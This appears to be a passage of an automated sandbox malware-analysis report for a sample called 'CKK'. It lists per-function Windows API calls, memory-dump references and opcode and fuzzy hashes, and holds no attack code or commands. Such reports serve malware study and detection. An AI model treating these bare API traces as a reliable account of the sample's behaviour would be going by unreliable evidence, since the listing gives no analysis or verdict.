                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Show$Enable$MessageSend
                                                                                              • String ID:
                                                                                              • API String ID: 642888154-0
                                                                                              • Opcode ID: 6d53bf0763319f1cd54f92f3c19eae329840640f471d2a5443a02309776744b3
                                                                                              • Instruction ID: d1fd7bf99fa9c6d20fd9d6b7ada281b959531d6d043fb3bfb3cf7c8356170d89
                                                                                              • Opcode Fuzzy Hash: 6d53bf0763319f1cd54f92f3c19eae329840640f471d2a5443a02309776744b3
                                                                                              • Instruction Fuzzy Hash: 9341D574601640AFDB22EF54C899FE47BE0FB0A714F580168E5188F263DF35A842CF50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • IsWindowVisible.USER32(?), ref: 00A54C95
                                                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00A54CB2
                                                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00A54CEA
                                                                                              • _wcslen.LIBCMT ref: 00A54D08
                                                                                              • CharUpperBuffW.USER32(00000000,00000000), ref: 00A54D10
                                                                                              • _wcsstr.LIBVCRUNTIME ref: 00A54D1A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                              • String ID:
                                                                                              • API String ID: 72514467-0
                                                                                              • Opcode ID: ddd17beef6ad275ecb0e28439d38c468e1abd5f985f2280eb9adbf0db27e656e
                                                                                              • Instruction ID: 95c2bd747200dcff8cd9aa6dfdf2b696ab6a8d7ab42181c01944a7360182e0bc
                                                                                              • Opcode Fuzzy Hash: ddd17beef6ad275ecb0e28439d38c468e1abd5f985f2280eb9adbf0db27e656e
                                                                                              • Instruction Fuzzy Hash: 05212932204204BBEB259B79ED09E7B7BACEF49764F108039FC05DA191EA75DC8587A0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 009F3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009F3A97,?,?,009F2E7F,?,?,?,00000000), ref: 009F3AC2
                                                                                              • _wcslen.LIBCMT ref: 00A6587B
                                                                                              • CoInitialize.OLE32(00000000), ref: 00A65995
                                                                                              • CoCreateInstance.OLE32(00A8FCF8,00000000,00000001,00A8FB68,?), ref: 00A659AE
                                                                                              • CoUninitialize.OLE32 ref: 00A659CC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                              • String ID: .lnk
                                                                                              • API String ID: 3172280962-24824748
                                                                                              • Opcode ID: 13d6651eb8bfc692aef7ee06cbfcefc2af6d5c685252be8964953fdf9f0e381d
                                                                                              • Instruction ID: 0ecc18733895c4a396078650e0f02b13df13abc755d12ab5869e8a2add704730
                                                                                              • Opcode Fuzzy Hash: 13d6651eb8bfc692aef7ee06cbfcefc2af6d5c685252be8964953fdf9f0e381d
                                                                                              • Instruction Fuzzy Hash: F3D16071A086059FC714DF28C484A2ABBF1FF89724F14885DF88A9B361DB31EC45CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00A50FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00A50FCA
                                                                                                • Part of subcall function 00A50FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00A50FD6
                                                                                                • Part of subcall function 00A50FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00A50FE5
                                                                                                • Part of subcall function 00A50FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00A50FEC
                                                                                                • Part of subcall function 00A50FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00A51002
                                                                                              • GetLengthSid.ADVAPI32(?,00000000,00A51335), ref: 00A517AE
                                                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00A517BA
                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00A517C1
                                                                                              • CopySid.ADVAPI32(00000000,00000000,?), ref: 00A517DA
                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00A51335), ref: 00A517EE
                                                                                              • HeapFree.KERNEL32(00000000), ref: 00A517F5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                              • String ID:
                                                                                              • API String ID: 3008561057-0
                                                                                              • Opcode ID: fc8b4f61c3c68335167b8943797fd7353af7650c841fd153c1c4ea7e29488529
                                                                                              • Instruction ID: a61cc106d425a6329d6abc053c6304dc0a01f355e74c7e023e2bfb98febe1e58
                                                                                              • Opcode Fuzzy Hash: fc8b4f61c3c68335167b8943797fd7353af7650c841fd153c1c4ea7e29488529
                                                                                              • Instruction Fuzzy Hash: 88115971500205EBDB109BA8DC89FBE7BB9FB49366F104218E881A7210D735A949CF60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00A514FF
                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00A51506
                                                                                              • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00A51515
                                                                                              • CloseHandle.KERNEL32(00000004), ref: 00A51520
                                                                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00A5154F
                                                                                              • DestroyEnvironmentBlock.USERENV(00000000), ref: 00A51563
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                              • String ID:
                                                                                              • API String ID: 1413079979-0
                                                                                              • Opcode ID: aca7ba0ece839e14bc9cbd06d69702187b62081152df41c50a26e976cdee61fa
                                                                                              • Instruction ID: aea6de5731bc40de2798a1540f811554db45d4f6fc11b9bf0556179fe4f369e3
                                                                                              • Opcode Fuzzy Hash: aca7ba0ece839e14bc9cbd06d69702187b62081152df41c50a26e976cdee61fa
                                                                                              • Instruction Fuzzy Hash: 34114772500209ABDB11CFA8ED49FEA7BB9FB48759F044124FE05A2060D3758E65EB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,00A13379,00A12FE5), ref: 00A13390
                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00A1339E
                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A133B7
                                                                                              • SetLastError.KERNEL32(00000000,?,00A13379,00A12FE5), ref: 00A13409
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                              • String ID:
                                                                                              • API String ID: 3852720340-0
                                                                                              • Opcode ID: 25eb76c089856fed897679b83ff605a5a93f913106fbdd6603a09dc566473858
                                                                                              • Instruction ID: 2d7e44218a7d94a91a8cdf1cf3670ac5ca1deacd1fbe2006e2fc22351bc08627
                                                                                              • Opcode Fuzzy Hash: 25eb76c089856fed897679b83ff605a5a93f913106fbdd6603a09dc566473858
                                                                                              • Instruction Fuzzy Hash: 6D01B133609321BEEE257FB47D85AE72A94EB0537A720032AF420891F1EF114D835658
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,00A25686,00A33CD6,?,00000000,?,00A25B6A,?,?,?,?,?,00A1E6D1,?,00AB8A48), ref: 00A22D78
                                                                                              • _free.LIBCMT ref: 00A22DAB
                                                                                              • _free.LIBCMT ref: 00A22DD3
                                                                                              • SetLastError.KERNEL32(00000000,?,?,?,?,00A1E6D1,?,00AB8A48,00000010,009F4F4A,?,?,00000000,00A33CD6), ref: 00A22DE0
                                                                                              • SetLastError.KERNEL32(00000000,?,?,?,?,00A1E6D1,?,00AB8A48,00000010,009F4F4A,?,?,00000000,00A33CD6), ref: 00A22DEC
                                                                                              • _abort.LIBCMT ref: 00A22DF2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$_free$_abort
                                                                                              • String ID:
                                                                                              • API String ID: 3160817290-0
                                                                                              • Opcode ID: ebd10250eac6f71a7e29bf360e96cb187285c572235a24970a8658607473220a
                                                                                              • Instruction ID: fff2c5440d90668a06d1a4badaa287386ed7cd0e5bd77744a355107968183bc8
                                                                                              • Opcode Fuzzy Hash: ebd10250eac6f71a7e29bf360e96cb187285c572235a24970a8658607473220a
                                                                                              • Instruction Fuzzy Hash: 4BF0C236544A3077D622677CBD0AF5A2669AFD27B1F250538F824A61E2EE3488035770
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00A09639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000), ref: 00A09693
                                                                                                • Part of subcall function 00A09639: SelectObject.GDI32(?,00000000), ref: 00A096A2
                                                                                                • Part of subcall function 00A09639: BeginPath.GDI32(?), ref: 00A096B9
                                                                                                • Part of subcall function 00A09639: SelectObject.GDI32(?,00000000), ref: 00A096E2
                                                                                              • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00A88A4E
                                                                                              • LineTo.GDI32(?,00000003,00000000), ref: 00A88A62
                                                                                              • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00A88A70
                                                                                              • LineTo.GDI32(?,00000000,00000003), ref: 00A88A80
                                                                                              • EndPath.GDI32(?), ref: 00A88A90
                                                                                              • StrokePath.GDI32(?), ref: 00A88AA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                              • String ID:
                                                                                              • API String ID: 43455801-0
                                                                                              • Opcode ID: 032aa2ce561fd5a4250f392f01103e3618273e928828c47fe40ab0e9613694fc
                                                                                              • Instruction ID: 1bee187b74c180ef32593763893bdd2fca88e39796d6839f65d2ae815c80b548
                                                                                              • Opcode Fuzzy Hash: 032aa2ce561fd5a4250f392f01103e3618273e928828c47fe40ab0e9613694fc
                                                                                              • Instruction Fuzzy Hash: BE11B776000149FFDB129F94EC88EAA7F6DEB083A4F048012BA199A1A1C7719D56DFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetDC.USER32(00000000), ref: 00A55218
                                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00A55229
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A55230
                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00A55238
                                                                                              • MulDiv.KERNEL32 ref: 00A5524F
                                                                                              • MulDiv.KERNEL32 ref: 00A55261
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsDevice$Release
                                                                                              • String ID:
                                                                                              • API String ID: 1035833867-0
                                                                                              • Opcode ID: ea6fc0990a5ba69fd7bc670f669a0d4ef9bd37d62ebc6855444e59f621b1a699
                                                                                              • Instruction ID: 665aabb60c151f51da66cad38f60ac9924f3a024707cb0800c869b0e2763536e
                                                                                              • Opcode Fuzzy Hash: ea6fc0990a5ba69fd7bc670f669a0d4ef9bd37d62ebc6855444e59f621b1a699
                                                                                              • Instruction Fuzzy Hash: 5E014F75E00718BBEB109BF59C49A5EBFB8FF48761F044065FA04E7281DA709905CFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 009F1BF4
                                                                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 009F1BFC
                                                                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 009F1C07
                                                                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 009F1C12
                                                                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 009F1C1A
                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 009F1C22
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Virtual
                                                                                              • String ID:
                                                                                              • API String ID: 4278518827-0
                                                                                              • Opcode ID: e70141c5eaafbb6a26839cd2e513b650495ec859dd4a7ad756e45a3571f5266d
                                                                                              • Instruction ID: 56c7aaa1411893fa6fa7ea3f14772ff8f4d49cd90869fd01a3f6abc1e52abff8
                                                                                              • Opcode Fuzzy Hash: e70141c5eaafbb6a26839cd2e513b650495ec859dd4a7ad756e45a3571f5266d
                                                                                              • Instruction Fuzzy Hash: 94016CB09027597DE3008F5A8C85B52FFA8FF19354F00411B915C47941C7F5A864CFE5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • PostMessageW.USER32 ref: 00A5EB30
                                                                                              • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00A5EB46
                                                                                              • GetWindowThreadProcessId.USER32(?,?), ref: 00A5EB55
                                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A5EB64
                                                                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A5EB6E
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00A5EB75
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                              • String ID:
                                                                                              • API String ID: 839392675-0
                                                                                              • Opcode ID: 9ff9db9e24cf12ff45dd10bd89adb6a750a89d844e6ee588646de38336b23fbb
                                                                                              • Instruction ID: a85f701eb67f97bf13f5bedd2732450f5371fa8f1201b7c858c28fca02347d37
                                                                                              • Opcode Fuzzy Hash: 9ff9db9e24cf12ff45dd10bd89adb6a750a89d844e6ee588646de38336b23fbb
                                                                                              • Instruction Fuzzy Hash: 6AF05472240158BBE72197929C4DEEF7E7CEFCAB21F004168F601D1091E7B45A02CBB5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetClientRect.USER32 ref: 00A47452
                                                                                              • SendMessageW.USER32(?,00001328,00000000,?), ref: 00A47469
                                                                                              • GetWindowDC.USER32(?), ref: 00A47475
                                                                                              • GetPixel.GDI32(00000000,?,?), ref: 00A47484
                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00A47496
                                                                                              • GetSysColor.USER32 ref: 00A474B0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                              • String ID:
                                                                                              • API String ID: 272304278-0
                                                                                              • Opcode ID: af8db82da2cdc70ef72a9b66b9e6c151bfd9449924b1ee6cc3885af95806f5ce
                                                                                              • Instruction ID: 93d4d6b77742196b4135a10e23f47a9e8cdb8d9d7823dd7cb864a5bab2aab629
                                                                                              • Opcode Fuzzy Hash: af8db82da2cdc70ef72a9b66b9e6c151bfd9449924b1ee6cc3885af95806f5ce
                                                                                              • Instruction Fuzzy Hash: 89014631500255EFEB519FA4EC08BAE7BB6FF04322F614164F916A21A1DB311E52AF60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A5187F
                                                                                              • UnloadUserProfile.USERENV(?,?), ref: 00A5188B
                                                                                              • CloseHandle.KERNEL32(?), ref: 00A51894
                                                                                              • CloseHandle.KERNEL32(?), ref: 00A5189C
                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00A518A5
                                                                                              • HeapFree.KERNEL32(00000000), ref: 00A518AC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                              • String ID:
                                                                                              • API String ID: 146765662-0
                                                                                              • Opcode ID: a56ca8fc4fcb44c9a84f12599698e76e77658ce1051585402907db7f533035c0
                                                                                              • Instruction ID: 96cdd032f100e2daed4877bf198256c431a7f4b6b34ee6b0a69c35ad9f6faf07
                                                                                              • Opcode Fuzzy Hash: a56ca8fc4fcb44c9a84f12599698e76e77658ce1051585402907db7f533035c0
                                                                                              • Instruction Fuzzy Hash: D6E0C236004101BBDA019BE1ED0CD0ABB29FB49B32B108220F22585474CB329422EF60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 009F7620: _wcslen.LIBCMT ref: 009F7625
                                                                                              • GetMenuItemInfoW.USER32 ref: 00A5C6EE
                                                                                              • _wcslen.LIBCMT ref: 00A5C735
                                                                                              • SetMenuItemInfoW.USER32 ref: 00A5C79C
                                                                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00A5C7CA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: ItemMenu$Info_wcslen$Default
                                                                                              • String ID: 0
                                                                                              • API String ID: 1227352736-4108050209
                                                                                              • Opcode ID: 07939dff2beaaef0abc762096258ea2c94d1c02cc6ed92f2d2a29f96f9263c10
                                                                                              • Instruction ID: bca763cded48cf285b5a0a318e1c7216d46339e5447f50a91fd61162426ef56a
                                                                                              • Opcode Fuzzy Hash: 07939dff2beaaef0abc762096258ea2c94d1c02cc6ed92f2d2a29f96f9263c10
                                                                                              • Instruction Fuzzy Hash: F451BD716043019FD7149F28C885B6AB7E8BB89321F040A2DFD95E39A5DB74D948CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ShellExecuteExW.SHELL32(0000003C), ref: 00A7AEA3
                                                                                                • Part of subcall function 009F7620: _wcslen.LIBCMT ref: 009F7625
                                                                                              • GetProcessId.KERNEL32(00000000), ref: 00A7AF38
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00A7AF67
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
